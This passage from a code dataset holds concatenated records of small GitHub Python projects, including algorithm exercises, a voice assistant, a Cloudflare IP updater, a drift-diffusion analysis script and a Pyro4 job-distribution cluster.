동전 0/동전 0.py","file_name":"동전 0.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41342323492","text":"import json\nimport os\nimport re\n\nfrom parser import Parser\nimport shutil\n\n\nclass StructureGenerator:\n def __init__(self, root_path: str, json_path: str):\n self.parser = Parser(root_path, json_path)\n\n def run(self) -> None:\n dir_structure = self.parser.get_json_dict()\n StructureGenerator.create_or_delete_dir(self.parser.root_path)\n self.generate_structure(dir_structure, self.parser.root_path)\n self.pretty_print_structure(dir_structure)\n\n # Generate json from dir\n # dir_structure = self.parser.get_json_dict_from_dir(self.parser.root_path)[self.parser.root_path]\n # to_print = json.dumps(dir_structure, indent=2)\n # json_file = open(self.parser.json_path, \"w\")\n # json_file.write(to_print)\n # json_file.close()\n\n @staticmethod\n def generate_structure(dir_structure, root):\n for key in dir_structure.keys():\n key_path = os.path.join(root, key)\n if type(dir_structure[key]) == dict:\n StructureGenerator.create_or_delete_dir(key_path)\n StructureGenerator.generate_structure(dir_structure[key], key_path)\n continue\n file = open(key_path, mode=\"w\")\n file.write(dir_structure[key])\n file.close()\n\n @staticmethod\n def create_or_delete_dir(dir_path):\n try:\n os.mkdir(dir_path)\n except FileExistsError:\n try:\n shutil.rmtree(dir_path)\n os.mkdir(dir_path)\n except OSError as e:\n print(f\"Could not delete {dir_path}, because: {e.strerror}\")\n\n def pretty_print_structure(self, dir_structure: dict) -> None:\n print(\"~~~The generated structure:~~~\")\n print(self.parser.root_path)\n\n result = json.dumps(dir_structure, indent=\"---\")\n replacements = [\n (r'\\{|\\}|\"|,', \"\"), # delete { } \" and ,\n (r'-+\\n', \"\"), # delete empty lines with -\n (r':\\s+(?=-)', \"\\n\") # replace :\\n+ with \\n\n ]\n for old, new in replacements:\n result = re.sub(old, new, result)\n print(result.strip())\n","repo_name":"InagoesIT/GenerateStructure","sub_path":"structure_generator.py","file_name":"structure_generator.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14256710756","text":"# Link to Program : https://www.hackerrank.com/challenges/alphabet-rangoli/problem\r\n\r\nimport string\r\n\r\n\r\ndef print_rangoli(size):\r\n alphabets = string.ascii_lowercase\r\n\r\n ascending_list = list(alphabets[0: size])\r\n descending_list = list(reversed(ascending_list))\r\n ascending_string = ''.join(ascending_list)\r\n descending_string = ''.join(descending_list)\r\n temp = []\r\n\r\n for i in range(size):\r\n temp.append('-'.join(list(f\"{descending_string[0: i]}{descending_list[i]}{ascending_string[size - i:size]}\")))\r\n\r\n for i in range(size - 1):\r\n temp.append('-'.join(list(f\"{descending_string[0: (size - 2) - i]}{list(ascending_list[1:size])[i]}{ascending_string[i + 2:size]}\")))\r\n\r\n s = ''\r\n\r\n for each in temp:\r\n s = s + each.center(len(temp[size - 1]), '-') + '\\n'\r\n\r\n return s\r\n\r\n\r\nif __name__ == '__main__':\r\n n = int(input())\r\n print(print_rangoli(n))\r\n","repo_name":"Thamizhiniyan18/HackerRank","sub_path":"Python/23 - Alphabet Rangoli.py","file_name":"23 - Alphabet Rangoli.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
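A minimal self-contained sketch of the greedy idea used in the 11047 coin-change record above, assuming, as that problem statement guarantees, that the coin values are sorted ascending and each value divides the next (the function name and the sample values below are illustrative assumptions, not taken from the record):

def greedy_coin_count(coins, k):
    # greedy is optimal here because every coin value divides the next one up
    count = 0
    for c in reversed(coins):
        count += k // c  # take as many of the current largest coin as fit
        k %= c           # leave the remainder for the smaller coins
    return count

assert greedy_coin_count([1, 5, 10, 50, 100, 500], 4200) == 10  # 8*500 + 2*100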
+{"seq_id":"72118962727","text":"import random\n\n\nclass Automat:\n def __init__(self, N, reg, rand):\n self.ciag = [random.randint(0, 1) if rand else 0 for _ in range(N)]\n self.ciag[N // 2] = 1 if not rand else self.ciag[N // 2]\n self.output = [self.ciag]\n reg = bin(reg)\n self.reg = []\n for ch in reg[2:]:\n self.reg.append(int(ch))\n for index in range(len(self.reg), 8):\n self.reg = [0] + self.reg\n print(self.reg)\n\n def evol(self):\n x = self.ciag[:]\n for i in range(len(self.ciag)):\n self.ciag[i] = self.reg[x[-i + 1] * 4 + x[i] * 2 + (x[-i - 1]) if i != len(x) - 1 else x[0]]\n self.output.append(self.ciag[:])\n\n def __str__(self):\n result = \"\"\n for x in self.output:\n for el in x:\n result += \"*\" if el else \" \"\n result += \"\\n\"\n return result\n\n\na = Automat(50, 90, False)\nprint(a.ciag)\nprint(a.reg)\nfor _ in range(200):\n a.evol()\nprint(a.ciag)\n\nprint(a)\n","repo_name":"BIGbadEL/Python_lab_2018-2019","sub_path":"Lab9/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32909388690","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom five_ui import Ui_MainWindow as five_ui_windows\nfrom PyQt5.QtCore import QTimer, pyqtSignal\n\n\nclass fiveWindows(QtWidgets.QMainWindow,five_ui_windows):\n signal_list = pyqtSignal(str)\n \n def __init__(self,result,parent=None):\n super().__init__(parent)\n super(fiveWindows,self).__init__(parent)\n self.setupUi(self)\n self.label.setText(\"\")\n self.label.setStyleSheet(\"border-image:url(rgb.jpg);\")\n self.label_3.setText(result)\n\nif __name__ == '__main__':\n import sys\n app = QtWidgets.QApplication(sys.argv)\n win = fiveWindows()\n win.show()\n sys.exit(app.exec_())","repo_name":"restuie/ICAPD","sub_path":"five_ui_control.py","file_name":"five_ui_control.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17440920354","text":"# 괄호 : 비슷한 문제를 푼 적 있음\n# 큐가 아니라 스택으로 풀어야 함!!\nfrom collections import deque\ndef VPS(line):\n stack = deque()\n for i in line:\n if i == '(':\n stack.append(i)\n else:\n if len(stack) > 0:\n j = stack.pop()\n else:\n return 'NO'\n if len(stack) > 0:\n return 'NO'\n return 'YES'\n\nn = int(input())\nfor _ in range(n):\n line = list(input())\n print(VPS(line))","repo_name":"dodoyeon/SW_Academy","sub_path":"BFS&DFS_novice/9012_gualho.py","file_name":"9012_gualho.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70464636009","text":"from kalkboks.math import cagr\n\n__author__ = 'schien'\n\nimport unittest\n\n\nclass MyTestCase(unittest.TestCase):\n\n def test_growth(self):\n i_0 = 1\n alpha = 0.50\n t = 2\n i = cagr(i_0, alpha, t)\n self.assertEqual(i, 2.25)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"dschien/kalkboks","sub_path":"tests/math_tests.py","file_name":"math_tests.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5182165233","text":"#Antoni Smółka\nfrom zad4testy import runtests\n\n#definiuje algorytm przeszukujacy graf w szerz (BFS)\ndef bfs(G, s, t):\n visited = [False] * len(G) \n prev = [None] * len(G)\n queue = [s]\n visited[s] = True\n\n#tworze 4 tablice, z czego jedna bedzie kolejką\n\n\n while queue:\n node = 
queue.pop(0)\n if node == t:\n break\n\n for neighbor in G[node]:\n if not visited[neighbor]:\n visited[neighbor] = True\n prev[neighbor] = node\n queue.append(neighbor)\n\n path = []\n if not visited[t]:\n return None\n\n current = t\n while current is not None:\n path.append(current)\n current = prev[current]\n path.reverse()\n return path\n\n #algorytm zwraca najkrotsza sciezke przedstawiona przy pomocy wierzcholkow pomiedzy s i t\n\ndef longer( G, s, t ):\n path = bfs(G, s, t)\n if not path:\n return None\n\n for i in range(len(path) - 1):\n u, v = path[i], path[i + 1]\n\n # usuwam krawędź uv z grafu\n G[u].remove(v)\n G[v].remove(u)\n\n # ponownie stostuje bfs zeby sprawdzic czy mimo usuniecia krawedzi istnieje sciezka \n # nowa zmienna zawiera sciezke w grafie z usunieta krawedzia\n new_path = bfs(G, s, t)\n\n #porownuje czy sciezka po usunieciu krawedzi jest dluzsza od sciezki w grafie pierwotnym, jesli tak to zwracam usunieta krawedz\n\n if not new_path or len(new_path) > len(path):\n return (u, v)\n\n return None\n\n \n\n\n# zmien all_tests na True zeby uruchomic wszystkie testy\nruntests( longer, all_tests = True )\n\n\n#złozonosc to O(V(V+E)) - V+E zlozonosc BFSa a V to zlozonosc petli for w funkcji longer(w najgorszym wypadku przechodzi przez wszystkie wierzcholki i wtedy wynosi V)\n","repo_name":"youngbucu/Studia","sub_path":"ASD/zad4/zad4ANTON.py","file_name":"zad4ANTON.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72387506728","text":"import string, re, itertools, time\n\nimport sys\n\nif sys.version[0]=='2':\n maketrans = string.maketrans\nelse:\n maketrans = str.maketrans\n \ndef valid(f):\n \"debe evaluar la cadena\"\n pass\n \ndef fill_in(formula):\n \"generar todas las formulas posibles de las letras con digitos\"\n letters = ''.join(set(re.findall('[A-Z]', formula))) #should be a string\n for digits in itertools.permutations('1234567890', len(letters)):\n table = maketrans(letters, ''.join(digits))\n yield formula.translate(table)\n \ndef solve(formula):\n \"\"\"Dada una formula como 'ODD + ODD == EVEN', encontrar los \n digitos que puedan resolverla.\n entrada: formula es una cadena; \n salida: es una cadena de con los digitos que son correctos\"\"\"\n l = []\n # ENCONTRAR TODAS LOS VALORES REALES\n print(\"%d SOLUCIONES ENCONTRADAS PARA LA FORMULA\"%(len(l)))\n if(len(l))>0:\n print(\"ej. %s\"%(l[0]))\n return l\n \nexamples = \"\"\"TWO + TWO == FOUR\nGLITTERS is not GOLD\nATOM**0.5 == A + TO + M\n\"\"\".splitlines()\n\ndef test():\n t0 = time.time()\n for example in examples:\n print('\\n '+13*' '+str(example))\n print('%6.4f sec.' % timedcall(solve, example))\n print('%6.4f tot.' 
% (time.time()-t0))\n\ndef timedcall(fn, *args):\n \"Call function with args; return the time in seconds and result.\"\n t0 = time.time()\n result = fn(*args)\n t1 = time.time()\n return t1-t0\n\ntest()\n","repo_name":"lennin92/curso_python","sub_path":"semana_3/cripto_aritmetica/fuerza_bruta.py","file_name":"fuerza_bruta.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27185951010","text":"N,K = map(int,input().split(\" \"))\nans = 0\nfor b in range(K+1,N+1):\n\tk = ((N - K) // b)\n\tnum = min(((N - K) % b) + 1,b-K)\n\tans += ((b - K) * (k + 1) - ((b - K) - num))\nif K == 0:\n\tprint(ans - N)\nelse:\n\tprint(ans)","repo_name":"banboooo044/AtCoder","sub_path":"ARC091/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15591359636","text":"# http://codeforces.com/problemset/problem/242/B\n\"\"\"\nWe will try to get all indexs of segment has min start , and max value of end\njust loop per index of segment which have min start , if they has end value is equal with max value of end => break\n=> we find it / this algo is O(n)\n\"\"\"\n\nnum_segments = int(input())\nstart_segments = []\nend_segments = []\n\n\ndef find_max_of_end(my_list): # O(n)\n max = my_list[0]\n for index, item in enumerate(my_list):\n if item > max:\n max = item\n return max\n\n\ndef find_index_of_min(my_list): #O(n)\n min = my_list[0]\n min_indexs = []\n for index, item in enumerate(my_list):\n if item < min:\n min = item\n for index, item in enumerate(my_list):\n if item == min:\n min_indexs.append(index)\n return min_indexs\n\n\nfor _ in range(num_segments):\n start, end = list(map(int, input().split()))\n start_segments.append(start)\n end_segments.append(end)\n\nmin_start_indexes = find_index_of_min(start_segments)\nmax_end = find_max_of_end(end_segments)\nresult = -1\nfor index in min_start_indexes: #O(n)\n if end_segments[index] == max_end:\n result = index\n break\nif result == -1:\n print(result)\nelse:\n print(result + 1)\n\n\n\"\"\"The second way :\n1. find max of end\n2. find min of start\n3. 
loop per element and check if the element has end == max and start == min\"\"\"","repo_name":"huyngopt1994/python-Algorithm","sub_path":"bigo/day-1-dyanimic-array-string/problem-242B.py","file_name":"problem-242B.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"20963254712","text":"def str2bool(v):\n    \"\"\"\n    Function to parse a string representing a bool\n    \"\"\"\n    if isinstance(v, bool):\n        return v\n    if v.lower() in ('yes', 'true', 'True', 't', 'y', '1'):\n        return True\n    elif v.lower() in ('no', 'false', 'False', 'f', 'n', '0'):\n        return False\n    else:\n        raise Exception('Boolean value expected.')\n\ndef is_tool(name):\n    \"\"\"\n    Check whether `name` is on PATH and marked as executable.\n\n    Returns\n    -------\n    True if `name` exists\n    \"\"\"\n\n    # from whichcraft import which\n    from shutil import which\n\n    return which(name) is not None","repo_name":"igsr/igsr_archive","sub_path":"igsr_archive/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14536659164","text":"import speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport datetime\nimport wikipedia\nimport pyjokes\nfrom gnewsclient import gnewsclient\n\n__listener = sr.Recognizer()\n__engine = pyttsx3.init()\n__voices = __engine.getProperty(\"voices\")\n__engine.setProperty(\"voice\", __voices[40].id) # 40 is for en_IN, Female voice\n__ext_responses = {}\n__ext_phrases = []\n\ndef __listen_all_voices__():\n    index = 0\n    for voice in __voices:\n        print(index, voice, voice.id)\n        __engine.setProperty(\"voice\", voice.id)\n        __engine.say(\"Hello World!\")\n        __engine.runAndWait()\n        index += 1\n\ndef set_voice(voice_num):\n    if voice_num in [0, 7, 10, 11, 17, 28, 32, 33, 37, 40, 41]:\n        __engine.setProperty(\"voice\", __voices[voice_num].id)\n    else:\n        raise Exception(\"No voice number found!\")\n\n############# Misc Functions #################\ndef erase_from_voice(voice, *phrases, debug = False):\n    if voice == None or voice.strip() == '': \n        return \"\"\n\n    if phrases == None: \n        return \"\"\n\n    voice_filtered = voice.strip()\n\n    for arg in phrases:\n        voice_filtered = voice_filtered.replace(arg,\"\").strip()\n    \n    if debug:\n        print(\"Voice:\", voice)\n        print(\"Phrases:\", phrases)\n        print(\"Voice filtered:\", voice_filtered)\n    \n    return voice_filtered\n\ndef get_joke():\n    return pyjokes.get_joke()\n\n############# Speaking #################\ndef speak(phrase, debug = True):\n    if phrase == None or phrase.strip() == '':\n        return\n\n    phrase = phrase.strip()\n    if \"\\\\n\" in phrase:\n        [speak_single(curr, debug) for curr in phrase.split(\"\\\\n\")]\n    else:\n        speak_single(phrase)\n    \ndef speak_single(phrase, debug = True):\n    if phrase == None or phrase.strip() == '':\n        return\n    phrase = phrase.strip()\n\n    if debug:\n        print(phrase)\n    __engine.say(phrase)\n    __engine.runAndWait()\n############# Listening #################\ndef listen():\n    voice_input = \"\"\n    try:\n        print(\"Listening...\")\n        with sr.Microphone() as source:\n            voice = __listener.listen(source)\n            voice_input = __listener.recognize_google(voice)\n            voice_input = voice_input.lower()\n    except:\n        print(\"Error in taking voice input\")\n    return voice_input\n\n############# Google News #################\ndef get_google_news(debug = False):\n    client = gnewsclient.NewsClient(language = 'english',\n                                    location = 'India',\n                                    max_results=10)\n    news_to_str = ''\n    for news in
client.get_news():\n news_to_str += (news['title'] + \".\\n\")\n\n if debug:\n print(\"News To Str: \", news_to_str)\n return news_to_str\n\n############# Time Functions #################\ndef get_time_in_gmt(debug = False):\n time = datetime.datetime.now(datetime.timezone.utc)\n if debug:\n print(time)\n return time\n\ndef get_delta_time(hours, minutes):\n return datetime.timedelta(0, (hours * 60 + minutes) * 60)\n\ndef convert_time(utc_time, code, debug = False):\n hours = 5\n minutes = 30\n\n if \"ist\" in code:\n pass\n elif \"aedt\" in code:\n hours = 11\n minutes = 0\n \n elif \"pdt\" in code:\n hours = -7\n minutes = 0\n\n elif \"gmt\" in code or \"utc\" in code:\n hours = 0\n minutes = 0\n\n elif \"cst\" in code:\n hours = -6\n minutes = 0\n\n elif \"brt\" in code or \"brst\" in code:\n hours = -3\n minutes = 0\n\n elif \"sast\" in code:\n hours = 2\n minutes = 0 \n\n elif \"jst\" in code:\n hours = 9\n minutes = 0\n else:\n print(\"hours: \", hours)\n print(\"minutes: \", minutes)\n print(\"code: \", code)\n print(\"utc_time: \", utc_time)\n raise Exception(\"Conversion not found to the required code\")\n\n if debug == True:\n print(\"hours: \", hours)\n print(\"minutes: \", minutes)\n print(\"code: \", code)\n print(\"utc_time: \", utc_time)\n\n time_new = (utc_time + get_delta_time(hours, minutes))\n return time_new.strftime(\"%I:%M %p\")\n\n############# Playing Song #################\ndef play_on_youtube(song):\n speak(\"playing \" + song)\n pywhatkit.playonyt(song)\n\n############# Custom Response #################\ndef save_response(phrase, response, debug = False):\n global __ext_responses\n \n if phrase == None or phrase.strip() == '': \n return\n \n __ext_responses[phrase.strip()] = response.strip()\n\n\ndef __contains_response(phrase, debug = False):\n global __ext_responses\n\n if phrase == None or phrase.strip() == '': \n return False\n \n phrase = phrase.strip()\n return (phrase in __ext_responses)\n \ndef get_response(phrase, debug = False):\n global __ext_responses\n\n if phrase == None or phrase.strip() == '': \n return \"\"\n \n phrase = phrase.strip()\n if __contains_response(phrase, debug):\n if debug:\n print(\"Response: \", __ext_responses[phrase])\n return __ext_responses[phrase]\n else:\n if debug:\n print(\"Does not contain phrases\")\n return \"\"\n\n############# Exit #################\ndef add_exit_phrases(phrase):\n global __ext_phrases\n \n __ext_phrases.append(phrase)\n\ndef contains_exit_phrase(phrase):\n global __ext_phrases\n\n if phrase == None or phrase.strip() == '': \n return False\n \n phrase = phrase.strip()\n if phrase in __ext_phrases:\n return True\n return False\n","repo_name":"KidBit-Academy/kidbit_assistant","sub_path":"kidbit_assistant/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15202070909","text":"from cf_api import CFApi\nfrom scan import scan, find_last_result\nfrom retrieve_ips import retrieve_ips\nimport json\nimport os \nfrom sys import argv\n\nenv_path = None\nfor argument in argv:\n if (argument.startswith(\"--config=\")):\n env_path = argument.replace('--config=', '')\n\nif env_path == None:\n dir_path = os.path.dirname(os.path.realpath(__file__))\n env_path = os.path.join(dir_path, \"config.json\")\n\nconfig = json.loads(open(env_path).read())\n\nif config['use_provided_result'] == False:\n retrieve_ips(config)\n scan(config['output_file'], config['scan_concurrency'], 
config['upload_speed'], config['custom_config'])\n config['last_result_path'] = find_last_result()\n\n\ncfApi = CFApi(config['email'], config['global_key'], config['zone_id'])\ncfApi.replace_ips(config['last_result_path'], config['max_no_records'], config['sub_domain'])\n","repo_name":"miadabdi/CF-Clean-IP-Setter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19432214313","text":"#just a very rough initial example of applying HDDM to ACT-R RT results\n\nimport hddm\nimport matplotlib.pyplot as plt\n\n#folder = '/home/ausmanpa/Documents/gp/ACTR_DDM/simulations/'\nfolder = '/actr/models/ACTR_DDM/simulations/'\nfname = 'test.csv'\n\ndata = hddm.load_csv(folder+fname)\n\n#the column names need to be adjusted (there are spaces in front of the actual name)\ncolNames = data.columns\nhddmData = data.rename(index=str, columns={'idx':'subj_idx',\n colNames[1]:colNames[1][1:],\n colNames[2]:colNames[2][1:],\n colNames[3]:colNames[3][1:],\n colNames[4]:colNames[4][1:],\n colNames[5]:colNames[5][1:]})\n\nprint(hddmData)\n\n#let's plot correct and error RT distributions first\nrtDistData = hddm.utils.flip_errors(hddmData)\nfig = plt.figure()\nax = fig.add_subplot(111, xlabel='RT', ylabel='count', title='RT distributions')\nfor i, subj_data in rtDistData.groupby('subj_idx'):\n subj_data.rt.hist(bins=20, histtype='step', ax=ax)\n \n\n#create model object where drift-rate v depends on the difficulty\nmodel = hddm.HDDM(hddmData, depends_on={'v':'stim'})\n\n#find a good starting point to help with convergence - but, seems to run into a warning/error\nmodel.find_starting_values()\n\n#draw 2000 samples, discard 20 as burn-in\nmodel.sample(2000, burn=20)\n\n#############################################################################################################\n\n#if we instead wanted to use the gelman-rubin statistic to check convergence, we should run multiple models:\n#this would take awhile!\nmodels=[]\nfor i in range(5):\n m = hddm.HDDM(hddmData, depends_on={'v':'stim'})\n m.find_starting_values()\n m.sample(1000,burn=10)\n models.append(m)\n \nhddm.analyze.gelman_rubin(models)\n\n#############################################################################################################\n\n#generate stats on the model results\nstats = model.gen_stats()\n\n#there are a lot of stats, so let's just look at a few\nstats[stats.index.isin(['v( easy)','v( difficult)','a','t'])]\n\n#let's plot the posteriors for these parameters\nmodel.plot_posteriors(['v','a','t']) #'v' will plot for both v( easy) and v( difficult)\n\n#this plots individual subject RT distributions on top of predictive likelihood\n#we have a lot of \"subjects\" so it's unreadable - will have to figure out argument to restrict the number of subjs plotted\nmodel.plot_posterior_predictive(figsize=(14, 10))\n\n#let's look at the posteriors of v for the two conditions\nv_Easy = model.nodes_db.node[['v( easy)']]\nhddm.analyze.plot_posterior_nodes([v_Easy[0]])\n\nv_Diff = model.nodes_db.node[['v( difficult)']]\nhddm.analyze.plot_posterior_nodes([v_Diff[0]])\n\nhddm.analyze.plot_posterior_nodes([v_Easy[0],v_Diff[0]])\nplt.xlabel('drift-rate')\nplt.ylabel('Posterior probability')\nplt.title('Posterior of drift-rate group means')\n\n#what's the posterior probability that the Easy drift rate is larger than the Difficult drift rate?\nprint('P(v_Easy > v_Diff) =', (v_Easy[0].trace() > 
v_Diff[0].trace()).mean())\n\n#what's the deviance information criterion (DIC; lower is better) of the model?\nprint('DIC =',model.dic)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"TheRealDrDre/ACTR_DDM","sub_path":"hddm/roughHDDM.py","file_name":"roughHDDM.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70250658410","text":"import subprocess\nimport time\nimport signal\n\ndef receiveSignal(signo, frame):\n\tprint(\"Program Paused\\n\")\n\treturn\n\nprint(\"Magnetic Flux Drum\")\nsignal.signal(signal.SIGINT, receiveSignal)\ncheck = 0\nwhile check == 0:\n\tprint(\"Press ctrl-C to stop playing\")\n\tsubprocess.call(\"./adc_readout\")\n\tans = input(\"Continue Playing?(y/n)\")\n\tif ans == 'n':\n\t\tcheck = 1\n","repo_name":"cashnn/capstone","sub_path":"Test_Programs/ADC_read_toterm/Flux_Drum.py","file_name":"Flux_Drum.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73403982248","text":"import random\nimport os, sys\nsys.path.append(os.path.abspath(os.path.join('..', '..', '..', '..', 'greed')))\nimport __main__\n\nDATA_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + \"/data/highscore.txt\"\n\nclass Director:\n    \"\"\"A person who directs the game. \n    \n    The responsibility of a Director is to control the sequence of play.\n\n    Attributes:\n        _keyboard_service (KeyboardService): For getting directional input.\n        _video_service (VideoService): For providing video output.\n    \"\"\"\n\n    def __init__(self, keyboard_service, video_service):\n        \"\"\"Constructs a new Director using the specified keyboard and video services.\n        \n        Args:\n            keyboard_service (KeyboardService): An instance of KeyboardService.\n            video_service (VideoService): An instance of VideoService.\n        \"\"\"\n        self._keyboard_service = keyboard_service\n        self._video_service = video_service\n    \n    def start_game(self, cast):\n        \"\"\"Starts the game using the given cast. 
Runs the main game loop.\n\n        Args:\n            cast (Cast): The cast of actors.\n        \"\"\"\n        self._video_service.open_window()\n        while self._video_service.is_window_open():\n            self._get_inputs(cast)\n            self._do_updates(cast)\n            self._do_outputs(cast)\n        self._video_service.close_window()\n\n    def _get_inputs(self, cast):\n        \"\"\"Gets directional input from the keyboard and applies it to the robot.\n        \n        Args:\n            cast (Cast): The cast of actors.\n        \"\"\"\n        robot = cast.get_first_actor(\"robots\")\n        velocity = self._keyboard_service.get_direction()\n        if (velocity.get_y() == 0):\n            robot.set_velocity(velocity) \n\n    def _do_updates(self, cast):\n        \"\"\"Updates the robot's position and resolves any collisions with artifacts.\n        \n        Args:\n            cast (Cast): The cast of actors.\n        \"\"\"\n        banner = cast.get_first_actor(\"banners\")\n        robot = cast.get_first_actor(\"robots\")\n        objects = cast.get_actors(\"objects\")\n\n        banner.set_text(\"\")\n        max_x = self._video_service.get_width()\n        max_y = self._video_service.get_height()\n        robot.move_next(max_x, max_y)\n\n        #check and update high score\n        with open(DATA_PATH,\"r\") as f:\n            high_score = int(f.readline())\n        if robot.get_score() > high_score:\n            with open(DATA_PATH,\"w\") as f:\n                f.write(str(robot.get_score()))\n            #keep the banner in sync with the newly written high score\n            high_score = robot.get_score()\n        banner.set_text(f\"SCORE: {robot.get_score()}   HIGH SCORE: {high_score}\") \n        \n        #loop through objects\n        for object in objects:\n            try:\n                #if object is sufficiently close to robot, delete object and change score\n                if (abs(object.get_position().get_x() - robot.get_position().get_x()) <= 15 and \n                object.get_position().get_y() >= robot.get_position().get_y() - 10):\n                    robot.set_score(robot.get_score() + object.get_score())\n                    cast.remove_actor(\"objects\", object)\n            except:\n                pass\n            try:\n                #delete objects as they exit the screen\n                if object.get_position().get_y() >= max_y - 10:\n                    cast.remove_actor(\"objects\", object)\n                else:\n                    object.move_next(max_x, max_y) \n            except:\n                pass \n        #spawn new objects up to the max number allowed on the screen\n        __main__.spawn_objects(cast, len(objects), robot.get_score())\n    \n    def _do_outputs(self, cast):\n        \"\"\"Draws the actors on the screen.\n        \n        Args:\n            cast (Cast): The cast of actors.\n        \"\"\"\n        self._video_service.clear_buffer()\n        actors = cast.get_all_actors()\n        self._video_service.draw_actors(actors)\n        self._video_service.flush_buffer()","repo_name":"JRoy99/cse210-04","sub_path":"greed/game/directing/director.py","file_name":"director.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26576797821","text":"import marshal\nimport Pyro4\nfrom concurrent.futures import ThreadPoolExecutor\nfrom queue import Queue\nfrom threading import Event\nimport inspect\n\n\ndef _serialize_function(func):\n    code_string = marshal.dumps(func.__code__)\n\n    return code_string\n\n\ndef _get_module_name(mod):\n    return inspect.getmodule(mod).__name__\n\n\ndef _get_module_source(mod):\n    return inspect.getsource(mod)\n\n\nclass PendingFuture:\n    \"\"\"\n    Abstraction for getting the result from a job\n    either returns the future object's result method\n    or blocks until a future has been added when the\n    job is waiting for a node to become available\n    \"\"\"\n    def __init__(self):\n        self._future = None\n        self._event = Event()\n\n    def __call__(self, *args, **kwargs):\n        # wait until a future object was created\n        self._event.wait()\n        return self._future.result()\n\n    def add_future(self, future):\n        self._future = future\n        
self._event.set()\n\n\nclass JobDoneCallable:\n \"\"\"\n Callable for when a node has finished it's current job.\n stores the node which was used to execute the job\n so it can add that node back to the queue when finished then\n return control back to the Cluster\n \"\"\"\n def __init__(self, node, callback):\n self.node = node\n self.callback = callback\n\n def __call__(self, *args, **kwargs):\n self.callback(self.node)\n\n\nclass Node:\n \"\"\"\n Each node used for executing jobs. Stores the associated id value to use, the Pyro4\n proxy object, and the number of processors available (if the node is the original)\n \"\"\"\n def __init__(self, address, port):\n self.daemon = Pyro4.Proxy(\"PYRO:dce_node@\" + address + \":\" + str(port))\n self.id = -1\n self.procs = 1\n\n\nclass Cluster:\n \"\"\"\n The main class used for distributing jobs among a list of nodes\n \"\"\"\n def __init__(self, job, node_list, module_dependencies=(), multi=False):\n \"\"\"\n Creates a new cluster and sets up the cluster to schedule new instances of the given\n job.\n :param job:\n :param node_list:\n :param module_dependencies:\n :param multi:\n \"\"\"\n self._nodes = []\n self._futures = []\n self._pending_jobs = Queue()\n self._node_queue = Queue()\n self._id = -1\n self._module_d = module_dependencies\n self._multi = multi\n\n # set up the nodes to use\n for address in node_list:\n node = Node(address[0], address[1])\n self._nodes.append(node)\n\n # get the id values to use for each\n self._get_id_values()\n\n # send any module dependencies\n self._send_modules()\n\n # send each node the entry point to use\n code_string = _serialize_function(job)\n self._setup(code_string)\n\n # set up multi-processing if set\n if self._multi:\n self._set_multi_processing()\n # if multi threaded, then add more copies of each node for the number of threads available\n for i in range(len(node_list)):\n address = node_list[i]\n original_node = self._nodes[i]\n for j in range(original_node.procs - 1):\n node = Node(address[0], address[1])\n node.id = original_node.id # copy the id value from the copy node\n self._nodes.append(node)\n\n # add each node to the queue\n for node in self._nodes:\n self._node_queue.put(node)\n\n # create the thread pool which will now be used to schedule jobs\n self.dispatcher = ThreadPoolExecutor()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.exit()\n\n def _get_id_values(self):\n results = []\n with ThreadPoolExecutor() as pool:\n # get the id value of each node to use\n for node in self._nodes:\n results.append(pool.submit(node.daemon.new_id))\n\n for i in range(len(results)):\n self._nodes[i].id = results[i].result()\n\n def _set_multi_processing(self):\n results = []\n with ThreadPoolExecutor() as pool:\n # get the number of processors in each node\n for node in self._nodes:\n results.append(pool.submit(node.daemon.get_num_processors))\n\n for i in range(len(results)):\n self._nodes[i].procs = results[i].result()\n\n def 